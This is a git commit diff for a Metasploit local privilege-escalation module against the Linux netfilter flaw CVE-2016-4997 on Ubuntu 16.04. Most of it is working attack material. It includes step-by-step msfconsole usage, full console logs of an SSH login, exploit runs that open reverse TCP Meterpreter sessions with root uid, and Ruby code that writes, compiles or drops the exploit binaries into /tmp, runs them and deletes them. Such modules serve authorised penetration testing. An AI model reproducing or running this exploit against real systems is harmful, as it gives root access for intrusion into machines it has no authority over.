binary drops work!
parent
3dff41c833
commit
23e5556a4c
Binary file not shown.
Binary file not shown.
|
@ -9,15 +9,14 @@ This module (and the original exploit) are written in two parts: desc, and pwn.
|
|||
There are a few requirements for this module to work (ubuntu):
|
||||
|
||||
1. ip_tables.ko has to be loaded (root running iptables -L will do such)
|
||||
2. libc6-dev-i386 needs to be installed to compile
|
||||
3. shem and sham can not be installed/running
|
||||
2. shem and sham can not be installed/running
|
||||
|
||||
This module has been tested against:
|
||||
|
||||
1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic)
|
||||
2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic
|
||||
|
||||
This does not work against the following vulnerable systems. Additional work may be required.
|
||||
This does not work against the following vulnerable systems. Additional work may be required to the binary and C code to enable these targets.
|
||||
|
||||
1. Fedora 24 < [kernel-4.6.3-300](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c18)
|
||||
2. Fedora 22 < [kernel-4.4.14-200](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c19)
|
||||
|
@ -28,7 +27,7 @@ This does not work against the following vulnerable systems. Additional work ma
|
|||
|
||||
1. Start msfconsole
|
||||
2. Exploit a box via whatever method
|
||||
4. Do: `use exploit/linux/local/ubuntu_netfilter`
|
||||
4. Do: `use exploit/linux/local/netfilter_priv_esc`
|
||||
5. Do: `set session #`
|
||||
6. Do: `set verbose true`
|
||||
7. Do: `exploit`
|
||||
|
@ -51,7 +50,7 @@ This does not work against the following vulnerable systems. Additional work ma
|
|||
|
||||
### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic)
|
||||
|
||||
Initial Access
|
||||
#### Initial Access
|
||||
|
||||
msf > use auxiliary/scanner/ssh/ssh_login
|
||||
msf auxiliary(ssh_login) > set rhosts 127.0.0.1
|
||||
|
@ -69,68 +68,151 @@ Initial Access
|
|||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
Escalate
|
||||
#### Escalate
|
||||
|
||||
msf auxiliary(ssh_login) > use exploit/linux/local/ubuntu_netfilter
|
||||
msf exploit(ubuntu_netfilter) > set session 1
|
||||
session => 1
|
||||
msf exploit(ubuntu_netfilter) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(ubuntu_netfilter) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.20.14.188:4444
|
||||
[*] Checking if libc6-dev-i386 is installed
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
|
||||
[+] libc6-dev-i386 is installed
|
||||
[*] Checking if ip_tables.ko is loaded
|
||||
[+] gcc-multilib is installed
|
||||
[+] gcc is installed
|
||||
[*] Live compiling exploit on system
|
||||
[*] Checking if ip_tables is loaded in kernel
|
||||
[+] ip_tables.ko is loaded
|
||||
[*] Checking if shem or sham are installed
|
||||
[+] shem and sham not present.
|
||||
[*] Writing desc executable to /tmp/452xNomE.c
|
||||
[*] Writing desc executable to /tmp/fI1xW1Js.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 3484 bytes in 1 chunks of 12068 bytes (octal-encoded), using printf
|
||||
[*] Executing /tmp/452xNomE, may take around 35s to finish. Watching for /tmp/rrOA1xsB to be created.
|
||||
[*] Writing 3291 bytes in 1 chunks of 11490 bytes (octal-encoded), using printf
|
||||
[*] Executing /tmp/fI1xW1Js, may take around 35s to finish. Watching for /tmp/GWqpwKnG to be created.
|
||||
[*] Waited 0s so far
|
||||
[*] Waited 10s so far
|
||||
[*] Waited 20s so far
|
||||
[*] Waited 30s so far
|
||||
[+] desc finished, env ready.
|
||||
[*] Writing payload to /tmp/HbFVMTZM
|
||||
[*] Writing payload to /tmp/Thzyfenv
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Writing pwn executable to /tmp/eRFqvuyG.c
|
||||
[*] Writing pwn executable to /tmp/wmfFiQKu.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 1418 bytes in 1 chunks of 4975 bytes (octal-encoded), using printf
|
||||
[*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 172.20.14.188
|
||||
[*] Meterpreter session 2 opened (172.20.14.188:4444 -> 172.20.14.188:45114) at 2016-09-16 01:16:52 -0400
|
||||
[*] Sending stage (1495599 bytes) to 192.168.2.137
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60982) at 2016-09-24 17:22:47 -0400
|
||||
[+] Deleted /tmp/fI1xW1Js.c
|
||||
[+] Deleted /tmp/GWqpwKnG
|
||||
[+] Deleted /tmp/fI1xW1Js
|
||||
[+] Deleted /tmp/Thzyfenv
|
||||
[+] Deleted /tmp/wmfFiQKu.c
|
||||
[+] Deleted /tmp/wmfFiQKu
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : ubuntu
|
||||
OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
|
||||
Architecture : x86_64
|
||||
Meterpreter : x86/linux
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
|
||||
|
||||
### Re-exploit
|
||||
#### Escalate w/ pre-compiled binaries
|
||||
|
||||
In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again.
|
||||
|
||||
msf exploit(ubuntu_netfilter) > set reexploit true
|
||||
reexploit => true
|
||||
msf exploit(ubuntu_netfilter) > set session 2
|
||||
session => 2
|
||||
msf exploit(ubuntu_netfilter) > exploit
|
||||
msf exploit(netfilter_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.20.14.188:4445
|
||||
[*] Checking if libc6-dev-i386 is installed
|
||||
[+] libc6-dev-i386 is installed
|
||||
[*] Checking if ip_tables.ko is loaded
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
|
||||
[-] libc6-dev-i386 is not installed. Compiling will fail.
|
||||
[-] gcc-multilib is not installed. Compiling will fail.
|
||||
[-] gcc is not installed. Compiling will fail.
|
||||
[*] Dropping pre-compiled exploit on system
|
||||
[*] Checking if ip_tables is loaded in kernel
|
||||
[+] ip_tables.ko is loaded
|
||||
[*] Checking if shem or sham are installed
|
||||
[+] shem and sham not present.
|
||||
[*] Writing payload to /tmp/OblBUbtc
|
||||
[*] Writing pwn executable to /tmp/u4PnMEdw.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 7820 bytes in 1 chunks of 21701 bytes (octal-encoded), using printf
|
||||
[*] Executing /tmp/8lQZGJdL, may take around 35s to finish. Watching for /tmp/okDjTFSS to be created.
|
||||
[*] Waited 0s so far
|
||||
[*] Waited 10s so far
|
||||
[*] Waited 20s so far
|
||||
[*] Waited 30s so far
|
||||
[+] desc finished, env ready.
|
||||
[*] Writing payload to /tmp/2016_4997_payload
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Writing pwn executable to /tmp/nOO6sYqi
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 172.20.14.188
|
||||
[*] Meterpreter session 3 opened (172.20.14.188:4445 -> 172.20.14.188:40370) at 2016-09-17 13:35:57 -0400
|
||||
[+] Deleted /tmp/OblBUbtc
|
||||
[+] Deleted /tmp/u4PnMEdw.c
|
||||
[+] Deleted /tmp/u4PnMEdw
|
||||
[-] Exploit failed: Rex::TimeoutError Operation timed out.
|
||||
[*] Exploit completed, but no session was created.
|
||||
[*] Sending stage (1495599 bytes) to 192.168.2.137
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:46778) at 2016-09-24 21:24:22 -0400
|
||||
[+] Deleted /tmp/okDjTFSS
|
||||
[+] Deleted /tmp/2016_4997_payload
|
||||
[+] Deleted /tmp/nOO6sYqi
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : ubuntu
|
||||
OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
|
||||
Architecture : x86_64
|
||||
Meterpreter : x86/linux
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
|
||||
|
||||
#### Re-exploit
|
||||
|
||||
In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again.
|
||||
|
||||
msf exploit(netfilter_priv_esc) > set reexploit true
|
||||
reexploit => true
|
||||
msf exploit(netfilter_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
|
||||
[+] libc6-dev-i386 is installed
|
||||
[+] gcc-multilib is installed
|
||||
[+] gcc is installed
|
||||
[*] Live compiling exploit on system
|
||||
[*] Checking if ip_tables is loaded in kernel
|
||||
[+] ip_tables.ko is loaded
|
||||
[*] Checking if shem or sham are installed
|
||||
[+] shem and sham not present.
|
||||
[*] Writing payload to /tmp/egMfQrrI
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Writing pwn executable to /tmp/Yf8CAdMu.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 192.168.2.137
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60984) at 2016-09-24 17:29:06 -0400
|
||||
[+] Deleted /tmp/egMfQrrI
|
||||
[+] Deleted /tmp/Yf8CAdMu.c
|
||||
[+] Deleted /tmp/Yf8CAdMu
|
||||
|
||||
meterpreter >
|
||||
|
||||
#### Re-exploit w/ pre-compiled binaries
|
||||
|
||||
msf exploit(netfilter_priv_esc) > set reexploit true
|
||||
reexploit => true
|
||||
msf exploit(netfilter_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
|
||||
[+] libc6-dev-i386 is installed
|
||||
[-] gcc-multilib is not installed. Compiling will fail.
|
||||
[-] gcc is not installed. Compiling will fail.
|
||||
[*] Dropping pre-compiled exploit on system
|
||||
[*] Checking if ip_tables is loaded in kernel
|
||||
[+] ip_tables.ko is loaded
|
||||
[*] Checking if shem or sham are installed
|
||||
[+] shem and sham not present.
|
||||
[*] Writing payload to /tmp/2016_4997_payload
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Writing pwn executable to /tmp/SZrv2NOR
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 192.168.2.137
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60996) at 2016-09-24 20:47:03 -0400
|
||||
|
||||
meterpreter >
|
||||
|
|
|
@ -344,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/,
|
||||
"execl(\"#{payload_path}\", NULL);")
|
||||
|
||||
def pwn(payload_path, pwn_file, pwn)
|
||||
def pwn(payload_path, pwn_file, pwn, compile)
|
||||
# lets write our payload since everythings set for priv esc
|
||||
vprint_status("Writing payload to #{payload_path}")
|
||||
write_file(payload_path, generate_payload_exe)
|
||||
|
@ -352,43 +352,55 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
register_file_for_cleanup(payload_path)
|
||||
|
||||
# now lets drop part 2, and finish up.
|
||||
print_status "Writing pwn executable to #{pwn_file}.c"
|
||||
rm_f pwn_file
|
||||
rm_f "#{pwn_file}.c"
|
||||
write_file("#{pwn_file}.c", pwn)
|
||||
cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
|
||||
register_file_for_cleanup("#{pwn_file}.c")
|
||||
if compile
|
||||
print_status "Writing pwn executable to #{pwn_file}.c"
|
||||
rm_f "#{pwn_file}.c"
|
||||
write_file("#{pwn_file}.c", pwn)
|
||||
cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
|
||||
register_file_for_cleanup("#{pwn_file}.c")
|
||||
else
|
||||
print_status "Writing pwn executable to #{pwn_file}"
|
||||
write_file(pwn_file, pwn)
|
||||
end
|
||||
register_file_for_cleanup(pwn_file)
|
||||
cmd_exec("chmod +x #{pwn_file}; #{pwn_file}")
|
||||
end
|
||||
|
||||
if not compile # we need to override with our pre-created binary
|
||||
# pwn file
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-2')
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')
|
||||
fd = ::File.open( path, "rb")
|
||||
pwn = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
# desc file
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-1')
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')
|
||||
fd = ::File.open( path, "rb")
|
||||
decr = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
# overwrite the hardcoded variable names in the compiled versions
|
||||
env_ready_file = '/tmp/okDjTFSS'
|
||||
payload_path = '/tmp/2016_4997_payload'
|
||||
end
|
||||
|
||||
# check for shortcut
|
||||
if datastore['REEXPLOIT']
|
||||
pwn(payload_path, pwn_file, pwn)
|
||||
pwn(payload_path, pwn_file, pwn, compile)
|
||||
else
|
||||
print_status "Writing desc executable to #{desc_file}.c"
|
||||
rm_f env_ready_file
|
||||
rm_f "#{desc_file}.c"
|
||||
rm_f desc_file
|
||||
write_file("#{desc_file}.c", decr)
|
||||
output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
|
||||
|
||||
if compile
|
||||
print_status "Writing desc executable to #{desc_file}.c"
|
||||
rm_f "#{desc_file}.c"
|
||||
write_file("#{desc_file}.c", decr)
|
||||
register_file_for_cleanup("#{desc_file}.c")
|
||||
output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
|
||||
else
|
||||
write_file(desc_file, decr)
|
||||
end
|
||||
rm_f env_ready_file
|
||||
register_file_for_cleanup(env_ready_file)
|
||||
register_file_for_cleanup("#{desc_file}.c")
|
||||
register_file_for_cleanup(desc_file)
|
||||
#register_file_for_cleanup(desc_file)
|
||||
if not file_exist?(desc_file)
|
||||
vprint_error("gcc failure output: #{output}")
|
||||
fail_with(Failure::Unknown, "#{desc_file}.c failed to compile")
|
||||
|
@ -409,7 +421,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
if file_exist?(env_ready_file)
|
||||
print_good("desc finished, env ready.")
|
||||
pwn(payload_path, pwn_file, pwn)
|
||||
pwn(payload_path, pwn_file, pwn, compile)
|
||||
return
|
||||
end
|
||||
sec_waited +=1
|
||||
|
|
Loading…
Reference in New Issue